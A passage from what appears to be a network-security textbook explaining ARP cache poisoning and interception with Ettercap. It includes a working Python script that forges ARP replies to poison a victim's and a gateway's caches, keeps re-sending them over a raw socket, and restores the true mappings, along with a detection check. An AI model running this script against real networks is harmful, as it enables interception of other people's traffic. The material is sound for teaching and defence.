my MAC address, I would get messages destined for you. By sending out an ARP
response indicating your IP address is at my MAC address, I put myself into the
middle of the communication flow.
This is only single-direction, though. If I tell the network that your IP address
is at my MAC address, I get only the messages that were supposed to go to you. To
capture the other half of the conversation, I also have to spoof the other party.
Between you and the internet, for example, I would poison your cache with the
gateway's IP address at my MAC address, and the gateway's cache with your IP address
at my MAC address. Even then, this only gets the messages to me. I also have to pass
each message on to its intended recipient, or the communication simply stops
because nobody receives what they expect. So my system must relay every intercepted
frame to the real destination, either by enabling IP forwarding in the kernel or by
having the attack tool forward the packets itself (Ettercap does the latter).
Since ARP caches do time out, if I stop sending these messages the poisoned entries
eventually expire (or are overwritten by the real host's own ARP traffic), and I
stop getting the messages I want. This means I need to keep sending these
unsolicited replies, commonly called gratuitous ARP messages. A gratuitous ARP
message is one that hasn't been requested but is offered nonetheless. There are
legitimate reasons for this behavior, such as a host announcing its address when it
boots or a failover address moving from one machine to another, which is part of
why a receiver will accept the unsolicited reply in the first place.
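To make the mechanics concrete, here is an added example (not code from the book and not Ettercap's code) that builds the unsolicited ARP replies by hand: one for each direction of the conversation, the matching "restore" replies to send when finished, a decoder, and the mismatch check a defender would run. All addresses and MACs are constructed lab values; the send loop assumes Linux, root, and a real interface name, and it does not forward traffic, which must be handled separately as described above.

```python
"""ARP cache poisoning frames built by hand (added example; not from the book
or from Ettercap).  Addresses below are constructed lab values."""
import socket
import struct
import time

ETH_P_ARP = 0x0806
ARP_REPLY = 2
ETH_ARP_LEN = 14 + 28  # Ethernet II header + ARP payload (IPv4 over Ethernet)


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Unicast frame carrying the ARP reply 'sender_ip is at sender_mac'.

    Nobody asked the question, so this is the unsolicited reply the text
    describes.  For poisoning, sender_mac is the attacker's MAC and
    sender_ip is the address being impersonated."""
    eth = struct.pack("!6s6sH", mac_bytes(target_mac), mac_bytes(sender_mac), ETH_P_ARP)
    arp = struct.pack(
        "!HHBBH6s4s6s4s",
        1, 0x0800, 6, 4,  # HTYPE Ethernet, PTYPE IPv4, HLEN, PLEN
        ARP_REPLY,
        mac_bytes(sender_mac), socket.inet_aton(sender_ip),
        mac_bytes(target_mac), socket.inet_aton(target_ip),
    )
    return eth + arp


def parse_arp(frame):
    """Decode a frame from build_arp_reply (or one captured off the wire)."""
    if len(frame) < ETH_ARP_LEN:
        raise ValueError("frame too short for Ethernet+ARP")
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    _, _, _, _, op, sha, spa, tha, tpa = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {
        "op": op,
        "sender_mac": mac_str(sha), "sender_ip": socket.inet_ntoa(spa),
        "target_mac": mac_str(tha), "target_ip": socket.inet_ntoa(tpa),
        "eth_src": mac_str(src), "eth_dst": mac_str(dst),
    }


def poison_pair(attacker_mac, victim_mac, victim_ip, gateway_mac, gateway_ip):
    """Both halves of the conversation: tell the victim the gateway lives at
    attacker_mac, and tell the gateway the victim lives at attacker_mac."""
    to_victim = build_arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip)
    to_gateway = build_arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip)
    return to_victim, to_gateway


def restore_pair(victim_mac, victim_ip, gateway_mac, gateway_ip):
    """Correct mappings to send when done, so the caches heal right away
    instead of waiting for the poisoned entries to time out."""
    return (build_arp_reply(gateway_mac, gateway_ip, victim_mac, victim_ip),
            build_arp_reply(victim_mac, victim_ip, gateway_mac, gateway_ip))


def conflicts_with(frame, trusted):
    """Defender's view: does this reply claim an IP at a MAC other than the
    one previously learned (the check arpwatch-style tools make)?"""
    arp = parse_arp(frame)
    known = trusted.get(arp["sender_ip"])
    return known is not None and known != arp["sender_mac"]


def poison_loop(iface, attacker_mac, victim_mac, victim_ip, gateway_mac,
                gateway_ip, interval=2.0, rounds=None):
    """Re-send the poisoned replies every `interval` seconds so the entries
    never expire, then re-ARP the true mappings on exit.  Linux only; needs
    root.  Forwarding between victim and gateway is NOT done here."""
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP))
    sock.bind((iface, 0))
    frames = poison_pair(attacker_mac, victim_mac, victim_ip, gateway_mac, gateway_ip)
    sent = 0
    try:
        while rounds is None or sent < rounds:
            for f in frames:
                sock.send(f)
            sent += 1
            time.sleep(interval)
    finally:
        for f in restore_pair(victim_mac, victim_ip, gateway_mac, gateway_ip):
            sock.send(f)
        sock.close()
```

The `restore_pair` step is the part most quick scripts omit: without it, the victim and gateway stay pointed at the attacker until their caches expire, which is exactly the outage a defender notices first.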
While other tools can be used for this, we can use the program Ettercap. Ettercap
has several modes of operation. One is a curses-style interface, meaning it runs in
a console but isn't strictly command line: it presents a character-based GUI.
Another is a full windowed graphical interface built on GTK. There is also a plain
text mode, which is the one to use when scripting the attack or capturing its
output to a log.
Figure 2-8 shows Ettercap after our target hosts have been selected and the ARP
poisoning has been started. To start the spoofing attack, I scanned for hosts to
get all of the MAC addresses on the network. Then, I selected the two targets and
started the ARP spoofing attack.